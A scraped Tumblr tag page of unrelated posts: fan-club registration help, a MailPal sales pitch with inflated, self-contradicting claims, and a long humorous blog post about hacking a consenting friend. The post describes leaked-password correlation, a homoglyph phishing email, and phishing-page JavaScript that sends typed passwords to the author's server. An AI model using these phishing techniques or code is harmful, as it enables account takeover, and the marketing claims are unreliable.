#Recover Gmail account without SMS
Explore tagged Tumblr posts
putschki1969 · 9 months ago
Note
Hello Sarah, I hope you are doing well and getting ready for the upcoming events. I'm currently in the process of joining the FC of Keiko and Wakana following your tutorials (Thank you very, very much 🙏), but I have run into some issues, and I have some questions. For Keiko's FC, during the Lawson ticket registration, despite using VPN and placing it in the trusted sites, I don't receive any email confirmation whatsoever in my inbox in order to continue. I tried 2 different mails without any results as it keeps sending me back to input email password again. Does it require a Japanese only mail? Has anyone come across this issue? With Wakana's FC, things seem more straightforward. However, with Bitfan, can you use your personal address since it looks so foreign friendly, or is the proxy from tenso the way to go? Apologies if this has been answered in the past. Thank you for your time, and I look forward to your reply.
Hi there!
Still recovering from yesterday but yeah, I am good and more than ready for the weekend. Looking forward to all the upcoming events. I have quite a few trips planned for the winter months so it's gonna be an exciting time. Can't believe I'll be seeing my girls on so many different occasions. I feel blessed😊
As for your questions, let me take a look and see what I can do...
Tumblr media
First of all, for anyone who is curious, these are my two tutorials for Keiko's and Wakana's fan club〈(•ˇ‿ˇ•)-→
Keiko: Meat & Chocolate
Wakana: Botanical Land
As stated in my tutorial for Keiko's fan club registration, a VPN service is actually not necessary. I initially believed you'd need one but I later tried it without a Japanese ID and it still worked out fine. So you better just do it without a VPN.
The way you describe the issue, it sounds like you are stuck at step 2.2./2.3. of my tutorial. During the mail/pw verification process, you have to enter an e-mail address and a suitable password. Please note that they have changed some of the password requirements since I've written the tutorial. It's now 8-16 characters with a combination of 3 or more of the following: uppercase letters, lowercase letters, numbers, and symbols. Please make sure that your password meets the criteria!
As for your e-mail address, there are absolutely no rules regarding the type of e-mail address, at least not as far as I know. You definitely don't need anything Japan-specific. Personally, I used my "[email protected]" address so if that worked fine, I'm sure that others would work just as well. No idea which e-mail service you are using but maybe try something very common like Gmail?
Maybe the verification mail is in your spam folder? Please be sure to check it. Also try to change your e-mail setting so you will always be able to receive mails with the following domains: 「l-tike.com」、「lawsonticket.jp」、「ent.lawson.co.jp」
I've not heard of anyone coming across this issue and I honestly don't know what other advice I could give except the things above. Usually, it shouldn't be an issue to receive the verification e-mail.
Regarding Bitfan, yes, it's quite foreigner friendly. I used to have my Austrian address in the settings. It worked perfectly fine. However, I later changed it to my Tenso address in case I'd ever have to receive a package via Bitfan. I don't think that has ever happened though. Even when Wakana is doing giveaways during her Bitfan broadcasts, the prizes are always shipped by the fan club (which should already have your Tenso address on file).
Please note that aside from Bitfan, you will also need a SKIYAKI account to get tickets for most of Wakana's big events. At first glance, the service is also very foreigner friendly but it seems like they made some changes to the registration process during the pandemic. The registration requires a verification via SMS. Years ago, I was able to sign up using my Austrian mobile phone number. I received the SMS and everything was fine. Unfortunately, the SMS verification no longer works properly for certain overseas numbers. I know of at least two fellow Kala-fans who have not been able to receive the text message which is required for the registration. A device change also requires an SMS verification so I've not been able to download the dedicated ticket app on my latest phone (still using my super old iPhone whenever I need show my digital ticket at the venue). Having said all that, I'd still encourage you to try it. Maybe your location/phone number is not affected and you'll have no issue receiving the SMS.
Update: @hkrwa just replied with a useful tip.
You can use this data-only SIM to receive SMS via a Japanese number. It has roaming function so you should be able to receive SMS in most countries in the world. https://www.jpsimshop.com/view/item/000000000109?category_page_id=ct71
Sorry for not being more helpful. I hope you can figure it all out!
11 notes · View notes
onelickactivate · 7 months ago
Text
MailPal: The Limitless Email Marketing Tool; A Review
Tumblr media
In the modern era of digitalisation, online communication is the foundation of business promotion to build a successful multi storey building. And as we all know, in the online professional marketing fields, the biggest way of doing such communication is through email, where you need to involve, attract and engage your audience regularly without fail. Here enters MailPal to solve the problems such as efficiency elevation, Operation Streamlining, and also helps building lasting relationships with your customers.
<<<<< Explore MailPal now & unlock amazing features! >>>>>
Fed up of paying tons of fees for your email service every month? Struggling to build a profitable and high return email list? Confused with new policies of Yahoo and Gmail regarding bulk mails? 
Do you also wish that someone could help you build high-converting, profitable lists and send them emails without paying those heavy amounts every month? 
Congrats, you are at the right page, because once, You and I were on the same page.
But then a few months back, I came across this amazing and surprising AI packed Email Marketing Tool named MailPal that lets its users send unlimited emails to their subscribers and audience. I’ve seen results of buying the product in my profit graph which has only ascended in the past few months of using MailPal, the tool to success as per my experience. Today, I’ll help you with a detailed review of MailPal and what all it offers and why you should buy it and also answer some other questions that are swimming across your mind.
Who Created MailPal and why?
                   Created by Email Marketers just like you
The core creators of MailPal are email marketers themselves. They went through the same sufferings once which you are going through such as paying huge amounts monthly in form of subscription as MailChimp and Aweber leaving your bank account dry, they knew everything about the problem and the excellent AI Power packed solution that they came up with is MailPal, with which you get
Groundbreaking features like
100% Done For You DMARC, DKIM, And SPF integrated autoresponder to get higher inboxing & clicks.
Send UNLIMITED emails, SMS texts and social media messages 
No costly ongoing monthly subscription to pay
All-in-one ecommerce autoresponder: Sync your store with MailPal for pop ups, automations, and targeted email marketing.
Use Mailpal's drag-and-drop builder to automate daily tasks and marketing workflows.
Gain clear insights from detailed segments and performance analytics.
Have your emails go straight to their inbox, not junk or spam folders
100% beginner friendly, no coding or technical skills required
Easy to use drag & drop design 
Choose from a range of stunning templates
Send email and SMS texts with just 1-click
No restrictions on email addresses 
Make huge profits every time you send an email
Get high-quality, high-converting leads to make more money
Stay compliant with CAN-SPAM and GDPR Regulations
Build your list using social media or our powerful 1-click opt-in
Enjoy a 72% higher opt-in rate than normal opt-in pages
Discover what works and what doesn’t with built-in analytics
Enjoy 24/7 expert support for whatever you need.
Tumblr media
<<<<< Explore MailPal now & unlock amazing features! >>>>>
Are Ecommerce Autoresponders on MailPal Effective?
Yes they are, here is how
Open Rates
Automated emails have an average open rate of 45.70% compared to the 18.80% open rate for standard emails.
Conversion Rates
Automated emails will generate you a 320% higher revenue per email than non-automated emails.
Sales Impact
If you use autoresponders, you can see up to a 20% increase in the sales, with abandoned cart emails alone recovering $17.90 per email sent.
Customer Retention
Companies using an automated email campaign report a 50 % hike in customer retention rates, as they keep customers engaged with personalised and timely content.
Click-Through Rates
Automated emails can outperform the average 1.1% click-through rate with more personalised content.
Repeat Purchases
E-commerce stores that utilise autoresponders see an impressive 35.5% Average repeat purchase rate. 
Speaking this from an honest experience, you can also be one of them with MailPal.
How can you send Limitless Emails with MailPal in a few clicks?
Step 1. Easily Login
Login to your Ai-based email marketing platform. Nothing to set up or configure, simply log in and you’re ready.
Step 2. List Uploading
Upload your email list, or if you don’t have one, use MailPal’s 1-click opt-in package to instantly start getting top-quality leads.
Step 3. Start Earning 
Start sending emails and start making money. With MailPal, you can even send SMS texts and social media messages to increase your conversions and your profits.
<<<<< Explore MailPal now & unlock amazing features! >>>>>
Master Your Fortune with MailPal Email Marketing Tool
As 2025 will begin, the email marketing industry will stand at a worth more than blockbuster $22 billion!
This actually means that people that are brave enough to conquer email marketing are earning their part of the fortune.
DO NOT MISS OUT AND RERET!
By utilising the incredible AI strength and software packed tech of MailPal, you can easily build the future of your dreams and turn it into reality.
Jokes apart, MailPal has all the required features to give you instant features in just 1 click.
Are other tools like MailPal Very Expensive?
Yes they indeed are, with just average features and far more expensive pricing than MailPal
The reason is that the email marketing tools you are using are just draining your bank account and offering traditional and common features which are not able to boost your engagement and hence the sales.
AWeber - $ 840/Year 
GetResponse - $ 720/Year
Active Campaign - $ 600/Year
Drip - $ 1800/Year
SendinBlue - $ 1200/Year
Kartra - $ 1440/Year
Klaviyo - $ 1250/Year and more such expensive tools you use from companies which ultimately care only about their profit and not yours.
Complete Offer Value Along with Bonuses Offered By MailPal
Send Unlimited Email to Unlimited Audience = $9990
Get high-quality & high-converting leads to make more money = $1590
High-Quality Training Included for making three Figures a day = $490
Free Commercial Rights = $1990
Done For you Template to Build App Instantly =$290
End to end SSL encryption to safeguard your Data & 24*7 malware protection =$490
24*7 Customer Support = Priceless
Double Your Money Back Guarantee = Priceless
Fast Action Bonus #1: Guide to Modern Email Marketing And Segmentation (Value:$197)
Fast Action Bonus #2: Guide to Strategy for Creating Email Funnels (Value:$297)
Fast Action Bonus #3: Guide to Email List Guru (Value:$147)
Fast Action Bonus #4: Guide to Email Marketing For Newbie Marketers (Value:$147)
Fast Action Bonus #5: Guide to Writing Engaging Emails (Value:$197)
Fast Action Bonus #6: Guide to Automated Email Marketing Funnel (Value:$197)
          Total Value Of Everything You Get–$ 14840
          For Limited Time Only Grab MailPal Now For
                                        $8.89       Only One-Time Payment    
                      NO MONTHLY FEES!!
<<<<< Explore MailPal now & unlock amazing features! >>>>>
Surprising Isn’t it? I was surprised too.
Wait let me surprise you more
30 Days Double Money Back Guarantee: If you feel like the hosting package of MailPal isn’t suitable for you and doesn’t help you at all, as a result of using it, MailPal will double your money back after giving it a try.
What are some Frequently asked Questions?
Q:   Will I get Support for this software?
A:  Yes,  24*7 support team is always available to solve your issues and help you get the best results from MailPal.
Q:   Are there any monthly fees?
A:  No, currently MailPal is offering a one-time price for this tool. So, get this best deal before reversing to a Monthly subscription.
Q:   Is there any money-back guarantee?
A:  Yes, MailPal is offering a 30 days money-back guarantee. So there is no risk when you act now. The only way you lose is by taking no action.
Q:   Does MailPal update their product and improve it?
A:  Yes, MailPal maintains their product and improves with new features.
Conclusion
As the email marketing industry is so return oriented and growing rapidly, more marketers and business owners are joining the rush to email mastery…
But you can get to the front of the rush and email your way to the peak…
Thanks to the support MailPal is providing!
So, what are you waiting for?
Remember, your one-time investment of $197.89 can change the entire game for you with MailPal’s email marketing magic that unlocks your marketing fortune and helps you become successful. 
Grab your lifetime access today and start emailing your way to the top right now! Remember all this information and advice is coming from a person like you, so go on and master your fortune…Thank You.
0 notes
knowledgeboxs · 4 years ago
Link
But, due to some issues, if you don't know about the registered email address as well as the mobile number and you are not able to Recover Gmail Account by SMS so you are wrong because you can also recover Gmail account without SMS .
0 notes
bbtphb · 2 years ago
Text
How to Reset Gmail Password
For practically all Google account holders, Gmail has emerged as one of the most used Google services. The majority of us rely on Gmail to stay updated or complete tasks, regardless of personal or professional matters. There may be a time when you might forget your Gmail/Google account password. Google provides a few simple options for recovering your Google account if you forget your password, including email and SMS verification. They are useful, but only if your Google account has your phone number or recovery email address.
There is still a chance to recover the account if you haven't done either of those things, but it will take longer than you anticipate. The method for recovering a Gmail password or account without a phone number or recovery email address will be covered in this post. Before we begin, it's important to note that the subsequent procedures will only function if you are currently connected into your Google or Gmail account on at least one device that has access to it.
Three days after making the request, or 73 hours later, you will receive an email with a link to reset the password. For this, you must ensure that you have logged in with the same Gmail account at least once, whether it be on a laptop, desktop, or mobile device. When you receive the mail, click "Get started" to reset your password or modify it using the onscreen prompts.
It's also important to note that this link to reset Gmail password is only good for 7 days, and you must try to create a new password within that time frame.
1 note · View note
windowsclick · 3 years ago
Text
How to Move Microsoft Authenticator To New Phone
Two-factor authentication (2FA) using an authenticator app is more secure than SMS messages, but what happens if you swap phones? If you use Microsoft Authenticator, here’s how to switch your 2FA accounts.
There is no way to export all of your accounts and then import them into a new phone, as we discovered. You must manually re-create your 2FA accounts on your new phone.
Tumblr media
Microsoft Authenticator, thankfully, has a backup and recovery feature. It’s worth noting that 2FA is meant to make it incredibly difficult to access an account without the 2FA code. Most accounts provide backup codes that you may use if your phone is lost or destroyed.
How to Move Microsoft Authenticator
Before changing your authenticator device, make sure you have a copy of the backup codes for each account. You’ll be able to utilize those in the future if you have trouble recovering your accounts.
On Your Old Phone, Enable the Backup Option
You’ll need to switch on the backup option on your previous phone if you need to retrieve your accounts on a new phone. Open Microsoft Authenticator to do so. At the upper right, press the three vertical dots, then “Settings.”
Toggle on “Cloud Backup” on an Android phone or “iCloud Backup” on an iPhone under the “Backup” section.
Your accounts will be backed up to the Microsoft account you used to set up Microsoft Authenticator in the first place. An iCloud account is also required for iPhones.
It’s quite clear if you’re worried about what’s actually backed up. Your usernames and passwords, as well as verification codes and other metadata, such as the moment the backup was generated, will all be included.
Authenticator uses AES-256 to encrypt a JSON Web Encryption blob (JWE) file. It then adds the contents to the JWE and hashes it using SHA-512 before putting the whole file and Key ID in your account. If you want to learn more about the backup and storage procedure, there is a full explanation accessible.
Using Your New Phone’s Recovery Option
After that, you’ll need to download Microsoft Authenticator and install it on your new phone. For Android, go to Google Play, and for iPhone, go to the Apple App Store. Because the Recovery tool will replace matching site accounts, don’t set up any accounts using Microsoft Authenticator until after you’ve used it.
Let’s assume you set up 2FA in Authenticator on your new phone for the Gmail account [email protected]. Authenticator on your previous phone, on the other hand, contains the Gmail account [email protected]. The Recovery tool will replace the [email protected] account on your new phone with the [email protected] account from your backup.
Conclusion
This procedure, as described above, will surely aid you in transferring Microsoft Authenticator to a new phone. These tactics appear to be successful for a large majority of people.
0 notes
knowledgeboxs · 5 years ago
Link
Recover Gmail account without phone number is quite simple . Don't be panic if your phone number don't listed on your account.
0 notes
defaultnamehere · 8 years ago
Text
Operation Luigi: How I hacked my friend without her noticing
This blog has moved! This post and other mistakes are now at https://mango.pdf.zone
Hello and welcome to a blog post. I am writing it and you are reading it. It's amazing what we can do with computers these days.
Several months ago
I'm at a ramen place with my friend Diana. Diana isn't her real name, but we're going to pretend it is because that's what all the cool journalists do and I wanna fit in too so don't ruin this for me okay.
I ask her if it would be okay for me to try and hack all her stuff. She's instantly visibly excited. I explain how this could result in me seeing everything she's ever put on a computer ever. She tells me she thinks this is going to be "so good". We lay down some rules:
I'll start some time in the next 12 months
No deleting anything she has
No disrupting her daily life
Stop asking if she's sure it's okay
Bonus rule from me: Do this entire thing in stealth mode. Don't ever let Diana know that I've started until it's too late.
I mean, obviously it worked since you and I are having this nice little textual discourse right now. Take my hand metaphorically, and I'll guide you through what I tried, my many flubs1, and how to protect yourself from what I did2.
And uh also at the end Mario's green friend is there.
Part 1: Research
"""Open Source Intelligence Gathering""""" AKA googling furiously and pretending you went to uni for this
Alright uh I'm pretty sure the first thing you do when you're hacking someone is find all their personal information. I'm talking about her email, phone number, address, star sign, whether she uses Android or Windows Phone, her birthday, and so on.
Jeez we're gonna need to know her email address aren't we?
People put lots of their information on LinkedIn (an information landscape that connects your inbox to people you met once in a bar and will forever file under "misc") because it tells them to.
The first thing I see on Diana's LinkedIn3 is her email address. I hastily put on my black hoodie and get my arms a bit stuck in the sleeves. Hacker voice I'm _in_4. Immediately I sigh and put my hands on my temples like a stressed-out banker. It's a @hotmail.com address, which surprises me since, well, who's using Hotmail in the year of our lord 2017? I mean geez if you used hotmail you'd miss out on gmail's excellent security features heyoooo
[x] email address [ ] the respect of my peers
Does she use this email for Twitter?
Yep.
How about her phone number?
I type a bunch of extremely clumsy things into Google. I'm talkin' "[email protected] phone". A matrix of what looks like zeroes and ones but is actually Google search results flies down my screen at about the speed a normal person would scroll at.
There's a sign-up page for a club she started at her university. The page says "Contact Diana Lastname at [email protected] or [her phone number]". pew pew got 'em.
[x] email [x] phone number [ ] the respect of my peers
Storing the goods
I paste all these things into a Google Doc - an advanced NSA hacking tool leaked in the recent Shadow Brokers incident.
While googling securely, I find an old blog of hers from 2009. It has a search box. I immediately slam "pet", "cat" and, "dog" in that search box like it's 2009. The name of someone's pet is often somehow involved in their security, either as their password or as a "Security""" question or something. I find the name of her dog from 2009 and vigorously paste it into my Google Doc.
Let's try getting into her iCloud account
Armed with my weapons-grade Google Doc, I'm ready to have a go at trying to get into something of Diana's5.
I don't really have a good reason for going after iCloud, so if you could just give me a break for one second
If I click "Forgot Apple ID?" on iCloud, by entering Diana's full name and email address, Apple tells me her Apple ID, and my screen permanently changes to green-on-black text to suit my new lifestyle.
I'm clicking around and there's a section called "account recovery". Sure, I'll have a go.
I can recover the account by clicking "I've uh lost my phone and forgot my password AND locked out of my email". Apple says "okay you colossal bozo, fine, but give us a phone number you CAN access, and we'll SMS you instructions to get back into your account". If I was in a movie doing ~crimes~ then I'd use a burner phone number. But since this is just my friend, I use my real phone number. I get an SMS from Apple being like "We received your request and will get back to you within 4 to 6 business millennia. Our Neo-Future Customer Service Representatives will contact your next-of-kin by whatever means of communication is prevalent at the time."
There's another "account recovery" option that says "use a device you already have". I click this, hoping to get a list of Diana's Apple devices. Instead it gives me this:
Daaaaaaaaaaaaaaaammmmit.
I have taken the wrong path in this text adventure game.
I've just notified Diana that someone's trying to reset her account.
For me that would set off all kinds of alarm bells and I'd start furiously investigating what's going on with all my accounts because I'm very cool and collected. But I'm just going to hope that Diana is a normal human being who is not obsessively paranoid like me and just ignores all of those pesky automated emails from Apple and Microsoft being like "blah blah account blah" or "blah blah new sign in blah" because I mean who really has time for those we've all got places to go and phones to scroll I mean reallY who's gonna pay attention to one liTtlE email when there's a whole OCEAN of low quality memes to scroll past on Facebook? I mean wouldn't you rather see some nice political memes? Newsfeed alert: Some guy from high school has just been tagged in- oh wow lOok this one's about your local government, wowee they've even managed to use the meme font while standing their ground and writing all the text as though it's a trying-to-sound-formal letter from your school principal who is still desperately trying to combat cyberbullying using nothing but stern words and beginning every sentence with "In regards to...."
There's no way for me to know if she saw the notification, so I stop rolling around on the floor whispering about low quality memes and get back to work.
Several days later
My phone rings. I can feel the vibration in my pocket and I'm like "is someone calling me here in the year of our lord 2017 I can't believe this". I don't recognise the number.
"Hello?"
"Hi, who am I talking to?"
"It's uh Alex."
"Alex?"
"Yeah."
"Alex ``?"
"Uh, noooo it's-"
"Ohhhhhhhhhhhhh."
"Wait so who am I talking to?"
It's Diana.
"What's up?", I ask.
She explains to me how she got an email from Apple about her account and there was a phone number in it. I tug my collar several meters into the next room, knocking over several carefully-potted indoor plants.
I hit pause on this whole thing, immediately own up, and say "yep, that was me, no need to worry, and I didn't get anywhere, your iCloud account is safe and s- WAIT a minute are you telling me you got an email from Apple saying someone tried to reset your account, realised it wasn't you, saw the phone number, and then CALLED it? What was your plan if some hacker answered??"
She didn't have a plan. She just called it as soon as she saw it, the absolutely off-the-rails lunatic.
We have a nice chat and agree to hang out later. She asks me if I've "hacked her already", and I say "no comment" to preserve my so-far flawless operational security.
Before I hang up, I wanna show off my work so far.
"Hey Diana, one more thing"
"Yeah?"
"Check it out. Did you ever play a game called........ Fashion Fantasy Beach?"6, I say, coolly and relatably.
Diana freaks out and starts laughing. She's forgotten about this game and me reminding her of her account brings back good memories.
"Can you like, find all the accounts I had on all those game websites?"
Sweet young Diana. If only it worked that way. Hacking can only be used for stealing government secrets and ransoming bitcoins. It's just not that simple.
"By the way, just checking, it's still okay for me to try and hack all your stuff right?" "SO okay"
Part 2: Hackinggggg
At this point I could reset Diana's password for some services by answering her "Security""" Questions with all the information I've gathered.
But, I realise, far too late and to the live studio audience's disappointment, that would violate the "don't interfere with her daily life" part of our deal. If I reset her password, this will lock her out of whatever account I reset. So, I have to get access stealthily. This will uh heavily involve knowing her password rather than resetting it.
For a long time I consider doing the renaissance-era "send 'em a word doc with a macro in it to get control of their computer then submit to defcon" but I worry that sweet young millennials like Diana don't even use Word because they do everything on their phone or Google Docs while simultaneously consuming 17.28 avocados per second look it up.7
I guess that makes the most valuable thing in her life her email. If you remember earlier, I cunningly divined her email address in Part 1, so I'm basically halfway there. If I get her email, I can just reset her password for Facebook, Twitter, Fashion Fantasy Beach, etc. My cyber attack vector cyber entry point exploit would then be typing the password into the Hotmail login screen using the Google Chrome Web Browsing Software.
The shady password market
Alright listen we're about to go into password paradise so buckle whatever it is you normally buckle. Hackers right, they hack websites. Hoo boy they just love to pop those hypertext pages. Like Dropbox, MySpace, LinkedIn, Adobe, Tumblr, and many, many more. They try to steal everyone's username and password from these sites by making a copy of the database and taking it. Sometimes, the database of usernames and passwords they steal gets released on the ~dark web~, for free or for money. Conveniently, there's a website (https://haveibeenpwned.com) which lets you type in your email address (not your password you big bozo) and find out whether any of your passwords have appeared in these leaked stolen databases.
But.... nowhere does it say you have to type in your email address. Cunningly, I type [email protected], executing hacking.
Here we can see a couple of websites Diana has accounts on have been hacked. The only one which had passwords stolen for Diana was Tumblr. So the next goal is to acquire the Tumblr database leak from 2013.
Let's get the old Tumblr database
I try to use my ~hacker connections~ to get a copy of the Tumblr database. I meet a someone whose forum handle is like d4rkrayne or whatever in a local park at 11pm. A colossal vape cloud leads me to him, waiting under a tree, puffing furiously. I look down my 1987 mirror-tinted aviators and say "how much?" (my voice comes out several octaves lower and all grizzly like a 40-year-old generic white dude movie star with like, juuust the right amount of stubble). He sells me the database on a pile of 442 floppy disks for 5,000 credits. What a ripoff. I teleport behind him, say "nothin' personal, kid", and hoverboard-kickflip into the night.
...I download the Tumblr database from a publicly accessible, unauthenticated, absolutely non-dark web website. I scramble to get back in my black hoodie, and whip on a second pair of sunglasses over the first. I'm in.
Ancient forbidden password rituals
The Tumblr database dump - a hacking Quest Item - is one long file with lines that look like this:
[email protected]:3a1920ceb2791d034973c899907847cb58810808
That weird thing after the email is a password hash. A password hash is like a scrambled up version of the password. You can't unscramble it. If you know the password though, you can scramble it and get the same omlette, if ya know what I'm sayin'🍳.
My goal here is to figure out what Diana's actual password is, given that I have her password hash. This process is commonly known as "hacking".
These particular passwords are not just hashed, but also salted8. This means that before each password is hashed, the good folks at Tumblr added an extra bit of text to the end of each one. So instead of hashing, say, cooldad64, they'd hash cooldad64HNc62V8.
Finding the salt
There's no official information on what kind of hashes are in Tumblr.txt.
The fully sick attack I want to do is: hashing a big list of passwords I just happen to have lying around wow and checking if any of the hashes match Diana's password hash. This is called a "dictionary attack", because the person who invented it was actually a dictionary. The trouble is, you need to know the salt to do this.
I google around some more, bask in the glory of very poorly constructed sentences on some ~hacker forums~, and ask my ~hacker connections~ in an attempt to find out what the salt is.
But I can't find it because fun fact I'm a total fraud.
Can I get the password... without the salt?
So remember how Tumblr salted the passwords by sticking some random stuff on the end to thwart wannabees like me?
The trouble is.... They stick the same thing (in my example, HNc62V8) on the end of every password. This isn't considered the best practice here in the year of our lord 2017, because it means that users with the same password have the same password hash. The emails and passwords would look like this:
[email protected]:cooldad64HNc62V8 [email protected]:cooldad64HNc62V8 [email protected]:p@triots69HNc62V8 [email protected]:Bongo1HNc62V8
I search Tumblr.txt for not [email protected], but for her password hash. (3a1920ceb2791d034973c899907847cb58810808)
I find more than 20 Tumblr users with the same password as Diana aw yeah
[REDACTED]@email.com:3a1920ceb2791d0... [REDACTED]@email.com:3a1920ceb2791d0… [REDACTED]@email.com:3a1920ceb2791d0… [REDACTED]@email.com:3a1920ceb2791d0…
This makes me think that Diana's password is probably not very unique, since all these other Dr. Who enthusiasts on Tumblr have also thought of it.
But also. Now I've got 20 other email addresses with the same password as Diana. Thanks to the miracle of everyone using the same password for everything, I've got a way to find Diana's password.
I just so happen AGAIN WOW WHATTA GUY to have the LinkedIn database dump from when LinkedIn was 360 whirlwind slam hacked in 20129.
Why do I care about the dump from the LinkedIn hack, you ask, fatigued from many gags and desperate for the part where we actually hack Diana?
LinkedIn also hashed their passwords in 2012, but they didn't add that freshly ground pink Himalayan rock salt to them. Also, the password hashing method they used is cripplingly insecure10 (SHA1 for all you extremely online people out there). Because of these flubs, most (>97%) of the passwords in the LinkedIn dump are available in plain text, not even hashed at all thanks to the hard work and GPU cycle donations of people in the password cracking community.
I get the 20-ish Tumblr emails who have the same Tumblr password as Diana, and look them all up in the LinkedIn dump. They're not all in there, but good enough baybee.
[REDACTED]@email.com:qwerty1 [REDACTED]@email.com:killer6 [REDACTED]@email.com:qwerty1 [REDACTED]@email.com:qwerty1
More than 80% of them have the same LinkedIn password. (Which we will say is qwerty1.)
This has gotta be Diana's password from Tumblr in 2013. Since all these people had the same password on Tumblr, and most of them have the password qwerty1 on LinkedIn, it's very likely that Diana's Tumblr password is qwerty1.
I try to log in to her Hotmail account with the password qwerty1.
"Incorrect password"
Wait please this was supposed to be easy please no why is it like this don't do this to me
Oh come on I was supposed to be hacking a normal person who uses the same password for everything this isn't fAiR. There are entire criminal industries built on the idea that people use the same password all over the place because nobody cares enough to remember more than a few passwords because they've got things to scroll on their phone okay.
Somehow, Diana is one of the rare few people who is not a security expert but has more than one password for her stuff.
I try this password on a few of her other accounts (Facebook, Twitter, iCloud) and it works on none of them11.
On Facebook, I'm conveniently informed that this password was her password 5 months ago, but isn't any more.
Looks like I just missed out. The plot thickens audibly.
This was supposed to be the part where I say "and then I logged into her email 100% stealthily", equip my third consecutive pair of sunglasses, and move on to the next bit. But alas, Diana was only in one leaked password list on haveibeenpwned.com at the time, so there goes that.
Fiiiiiiiiiiine whatever I don't even care I'm not crying, you're crying. Time to do this the old fashioned way. And by "the old fashioned way" I of course mean "the way government hackers do it".
Part 3: Hackinggggg (again)
Social engineering
Alright so we're just going to trick her into telling me her password. Is that cheating? Basically. But absolutely I'm going to do it anyway.
To get into her email, I need to know Diana's email password. Resetting the password won't work (since that would interrupt her life by locking her out of her email). I don't really wanna follow her around, man-in-the-middle attack her phone or laptop when it connects to insecure WiFi and steal her browser session, so that leaves us with: phishing.
You may have heard of "phishing", the process of emailing someone and tricking them into doing something, like giving you their password.
Now, hold up bucko, you're probably thinking of the kind of phish where someone says "good day sir I nigerian prince give you $1 million dollars USD u are royalty 2 me" etc. etc.
Or maybe you're thinking of someone sending an email that says "[heavy breathing] pls clikc on my urls http://click.here.to.get.ripped.in.three.weeks.verylegit.link/6x9M;PjxrY=WrS33n$Hcracked__767windows8+bitcoin.gpg.exe"
But with nothing more than paperclips, chewing gum, a single fidget spinner, and an advanced psychology degree, we can not only steal Diana's password, but do it without Diana realising she's been tricked.
Hand-crafting artisanal phishing emails to sell at the Sunday markets
Let's write down what we want to do:
Get Diana's email password
Don't let her realise that the email is not legit
Hmm I guess there were only two dot points uhh sorry that doesn't seem worth having dot points at all ummmm
So anYwAy the trick to phishing is that you don't want to engage the victim's attention. You want them to interact with your email mindlessly, without thinking it's a big deal. Kinda like how you click through email notifcations from Twitter (or anything that sends you email notifications) without really thinking about the email, because you're thinking about what awaits on the other end.
The other way, rather than distracting the victim, is to misdirect them. You give them something that's way more interesting to pay attention to than your dodgy link. Common examples of this include emails that say "OMG your account has been HACKED, log in here to fix it".
But of course, you log in to a fake website which steals your password.
Wow actually that sounds pretty12 easy13 doesn't it? Let's try that then.
I'll make an email that says "Your Microsoft Account Has Been Hacked And Uh If You Don't Log In Now It Will Get Deleted So Uh Yeah You Better Log In".
Instead of designing my own legit-looking Microsoft email, it's easier to just copy one that Microsoft has already made. I search my hotmail account14 for an automated email from Microsoft.
I use the incredibly cutting edge "Inspect Element" feature of the popular hacking software, Google Chrome, to edit the text of the email but keep the look. As I right click and hover over "Inspect Element", my laptop instantly explodes, I get root access to Microsoft, I'm added 50 times to every NSA watchlist, my text permanently changes to green-on-black, and I'm accepted to DEFCON.
Now it looks like this:
I can't send the email from my email account, because I'm not a total amateur. I use the popular hacking tool The Microsoft Sign Up Screen to make the hotmail account "[email protected]". If you look closely, "account" is spelled wrong. I used "msft" because it wouldn't let me include the word "microsoft".
I try to register an account with first name "Microsoft" and last name "Account Team". The signup form doesn't let me. Blast. Thwarted by Microsoft lackeys. Probably, Microsoft doesn't let you have "Microsoft" in your account name to prevent, uh, exactly what I'm doing. Hmmm. I don't really want to have a typo in the name, like "Micorsoft", since Diana might notice that.
Instead I, a level 8 Wizard, cast a spell to swap the "o" characters in "Microsoft" for a special unicode character (like an emoji but much worse) that looks exactly like an "o". It's not, of course, it's our old friend, the Greek letter "Omicron". Here's the two pals side-by side:
οo
Awww, just look at 'em having a blast. These little guys might look different in the font your device is using, but in the hotmail web UI font they look juuuust right👌.
So now, my account's name isn't "Microsoft", It's "Micr[omicron]s[omicron]ft", according to the code that checks whether you have a valid name when you sign up for an account.
I'm sure you're wondering how this whole process ends up with me getting Diana's password, laughing manically in my comically giant leather chair. After she clicks the link in my legit looking email, she'll be asked to log in15. The page she goes to will look just like the Hotmail login page, but it will really be a copy that sends the password to me.
How can I make such a page? Well I'll clone the real page, register a domain that looks similar to login.live.com, host my cloned page there, and so on. Juuust kidding, the static website hosting service Aerobatic happens to also be an excellent phishing service.
I can register [anything].aerobatic.io, and deploy my static HTML to that domain with their command line tool for free.
Shout outs to Aerobatic for the smooth smooth phishing UX. Use the referral code DIANA to be immediately reported to the NSA.
I copy the existing login.live.com page, and pre-fill [email protected] in the "email address" field. I deploy this page extremely trivially to login-live.aerobatic.io, and equip my fourth pair of sunglasses (don't worry I've earned it). This almost looks right, but the real Hotmail login form has a bunch of stuff after the / in the URL, so I copy/paste some of that good stuff too16.
Here's the exact URL, if you're interested. Also if you're not interested. It's gonna be there either way.
https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin
Perfect17. This looks similar enough to fool a cursory glance, and that's all we need baybee. Maybe she'll think "why do I have to log in again? I'm already logged in to my email?", but the email asks for a "Secure Login" (whatever that is).
Here's what the login page does:
// When the Login button is clicked or Enter is pressed $('#passwordForm').on('submit', function() { var password = $('#password').val(); // Create an image with a URL that points to my website. // The browser will request this URL in an attempt to load the image (which will fail since that URL doesn't exist) $('body').append('<img src="a-website-i-own.com/DIANA?'%20+%20password%20+%20'" alt="image">'); // Wait one second to simulate loading time (adjust to 0.1s if you don't live in Australia sigh), and then go to the real Hotmail login page. // Diana will already be logged in, so this will seem to her exactly like she's just logged in to hotmail. window.setTimeout(function() { window.location = 'login.live.com' }, 1000); return false; }
This works by sending her password to me when she clicks "log in". The password is sent a website of mine. Then I send her along to the real Hotmail, so it looks just liked she logged in. The website logs everything that gets sent to it, so I can then search my logs for "DIANA" to find the log containing the password.
This is all what I'm hoping for, anyway. The email says she has 48 hours to comply to create time pressure. Telling you that you have to do something right now is a common tactic to make you think instinctively and irrationally.
I login to my fake "Microsoft Account Team" hotmail account, send the email to [email protected] and wait for her to have herself a red-hot browse.
About 12 hours later, I check my logs to see if she's typed her password.
She doesn't.
I wait another 12 hours.
Still nothing.
I send the email again, wincing slightly, this time saying she has 24 hours.
